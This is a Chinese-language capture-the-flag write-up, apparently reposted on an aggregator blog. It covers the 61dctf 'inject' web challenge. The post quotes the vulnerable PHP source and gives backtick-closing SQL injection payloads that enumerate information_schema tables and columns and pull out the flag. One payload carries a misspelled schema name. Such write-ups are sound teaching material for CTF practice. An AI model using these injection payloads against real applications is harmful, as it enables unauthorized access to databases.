desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup

2023-12-12 23:38

本文主要是介绍desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

题目链接 :http://web.jarvisoj.com:32794/

描述

进入页面,发现只有 flag{xxx}
题目hint:先找到源码~

源码泄露

  • 使用后台目录扫描工具御剑进行后台扫描

源码泄露:
http://web.jarvisoj.com:32794/index.php~
  • F12查看器得到泄露的源码

<?phprequire("config.php");$table = $_GET['table']?$_GET['table']:"test";$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();$sql = "select 'flag{xxx}' from secret_{$table}";$ret = sql_query($sql);echo $ret[0];?>

代码分析

$table = $_GET['table']?$_GET['table']:"test";`
  • 当未输入table参数时,table的值默认为test

  • 当输入了table的参数时,table的值为输入的值

$table = Filter($table);
  • 对变量$table进行过滤,Filter函数为用户自定义的函数

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
  • 当mysqli_query()函数能够通过,则不调用Hacker()函数

  • 当mysqli_query()函数调用失败,则调用Hacker()函数

$sql = "select 'flag{xxx}' from secret_{$table}";$ret = sql_query($sql);echo $ret[0];
  • 定义sql语句并执行,且只输出查询语句的第一条

测试

  • 当令table=test

http://web.jarvisoj.com:32794/index.php?table=test

页面返回正常,flag{xxx}

  • 当令table为其他值,比如table=123

    http://web.jarvisoj.com:32794/index.php?table=123

    页面返回 Hello Hacker

从源码分析可知

//源码<?phprequire("config.php");$table = $_GET['table']?$_GET['table']:"test";$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();$sql = "select 'flag{xxx}' from secret_{$table}";$ret = sql_query($sql);echo $ret[0];?>

当table=test时,页面返回flag{xxx}

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();

因此该条语句没有跳转到Hacker(),而是执行了mysqli_query()函数
而反过来,当table为其他值时,mysqli_query()函数执行失败,从而执行了Hacker()

Key

观察可知,输入的table参数被desc 使用进行降序排序
并且,desc后使用的是 ` (反引号) 位于键盘Esc正下方

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();$sql = "select 'flag{xxx}' from secret_{$table}";$ret = sql_query($sql);
  • 关于反引号

    反引号 ` 在mysql中是为了区分mysql中的保留字符与普通字符而引入的符号

    例如,如果test表中存在一个”from”字段,当我们查找内容时,就需要使用反引号,以防使用保留字符而报错

    select  `from` from test
  • 关于desc查看表结构

    desc tablename  #查看table的结构信息

    例如,使用desc查看users表的结构

    desc users



因此,如果desc 后接的表不存在,则返回失败

  • 由此可知
    当table=test时,由于库中存在secret_test表,因此mysqli_query()函数返回成功,继续向下执行,从而输出了flag{xxx}
    当table=123时,因为库中不存在secre_123表,因此跳转hacker()函数结束程序

反引号闭合注入

通过反引号的闭合,可以构造SQL注入

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();$sql = "select 'flag{xxx}' from secret_{$table}";$ret = sql_query($sql);

构造payload,测试当前数据库名称

payload: ?table=test` ` union select database()

相当于

mysqli_query($mysqli,"desc `secret_test` ` union select database()`") or Hacker();$sql = "select 'flag{xxx}' from secret_test` ` union select database()";$ret = sql_query($sql);echo $ret[0];

这样,desc secret_test能够执行通过,并且下面的sql语句可以查询数据库

Tip1: 在第二条sql语句中,两个反引号就相当于了空格  

Tip2: 注意到最后页面只输出数组变量ret的第0位,而第0位恒为flag{xxx},所以为了控制输出,可以使用limit 1,1来进行约束,使返回结果从第1位开始

爆表名

payload: ?table=test` ` union select group_concat(table_name) from information_shcema.tables where table_schema=database()limit 1,1

查询到存在secret_flag,secret_test 两个表

爆字段

payload: ?table=test` `union select group_concat(column_name) from information_schema.columns where table_schema=database() limit 1,1

查询到存在flagUwillNeverKnow,username 两个字段

爆值

payload: ?table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag

查询到flag{luckyGame~}

总结

  1. desc + 表名  可以查询表的结构,同时也可以用来判断表是否存在

  2. 反引号 ` 在MySQL中用来区分保留字符与普通字符

  3. limit 关键字可以用来控制输出

原文:https://blog.csdn.net/qq_42939527/article/details/100129254

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

  

目前25000+人已关注加入我们

这篇关于desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/486341

相关文章

MySQL 中的 JSON 查询案例详解

《MySQL中的JSON查询案例详解》:本文主要介绍MySQL的JSON查询的相关知识,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录mysql 的 jsON 路径格式基本结构路径组件详解特殊语法元素实际示例简单路径复杂路径简写操作符注意MySQL 的 J

Windows 上如果忘记了 MySQL 密码 重置密码的两种方法

《Windows上如果忘记了MySQL密码重置密码的两种方法》:本文主要介绍Windows上如果忘记了MySQL密码重置密码的两种方法,本文通过两种方法结合实例代码给大家介绍的非常详细,感... 目录方法 1:以跳过权限验证模式启动 mysql 并重置密码方法 2:使用 my.ini 文件的临时配置在 Wi

MySQL重复数据处理的七种高效方法

《MySQL重复数据处理的七种高效方法》你是不是也曾遇到过这样的烦恼:明明系统测试时一切正常,上线后却频频出现重复数据,大批量导数据时,总有那么几条不听话的记录导致整个事务莫名回滚,今天,我就跟大家分... 目录1. 重复数据插入问题分析1.1 问题本质1.2 常见场景图2. 基础解决方案:使用异常捕获3.

SQL中redo log 刷⼊磁盘的常见方法

《SQL中redolog刷⼊磁盘的常见方法》本文主要介绍了SQL中redolog刷⼊磁盘的常见方法,将redolog刷入磁盘的方法确保了数据的持久性和一致性,下面就来具体介绍一下,感兴趣的可以了解... 目录Redo Log 刷入磁盘的方法Redo Log 刷入磁盘的过程代码示例(伪代码)在数据库系统中,r

mysql中的group by高级用法

《mysql中的groupby高级用法》MySQL中的GROUPBY是数据聚合分析的核心功能,主要用于将结果集按指定列分组,并结合聚合函数进行统计计算,下面给大家介绍mysql中的groupby用法... 目录一、基本语法与核心功能二、基础用法示例1. 单列分组统计2. 多列组合分组3. 与WHERE结合使

Mysql用户授权(GRANT)语法及示例解读

《Mysql用户授权(GRANT)语法及示例解读》:本文主要介绍Mysql用户授权(GRANT)语法及示例,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql用户授权(GRANT)语法授予用户权限语法GRANT语句中的<权限类型>的使用WITH GRANT

Mysql如何解决死锁问题

《Mysql如何解决死锁问题》:本文主要介绍Mysql如何解决死锁问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录【一】mysql中锁分类和加锁情况【1】按锁的粒度分类全局锁表级锁行级锁【2】按锁的模式分类【二】加锁方式的影响因素【三】Mysql的死锁情况【1

SQL BETWEEN 的常见用法小结

《SQLBETWEEN的常见用法小结》BETWEEN操作符是SQL中非常有用的工具,它允许你快速选取某个范围内的值,本文给大家介绍SQLBETWEEN的常见用法,感兴趣的朋友一起看看吧... 在SQL中,BETWEEN是一个操作符,用于选取介于两个值之间的数据。它包含这两个边界值。BETWEEN操作符常用

MySQL索引的优化之LIKE模糊查询功能实现

《MySQL索引的优化之LIKE模糊查询功能实现》:本文主要介绍MySQL索引的优化之LIKE模糊查询功能实现,本文通过示例代码给大家介绍的非常详细,感兴趣的朋友一起看看吧... 目录一、前缀匹配优化二、后缀匹配优化三、中间匹配优化四、覆盖索引优化五、减少查询范围六、避免通配符开头七、使用外部搜索引擎八、分

MySql match against工具详细用法

《MySqlmatchagainst工具详细用法》在MySQL中,MATCH……AGAINST是全文索引(Full-Textindex)的查询语法,它允许你对文本进行高效的全文搜素,支持自然语言搜... 目录一、全文索引的基本概念二、创建全文索引三、自然语言搜索四、布尔搜索五、相关性排序六、全文索引的限制七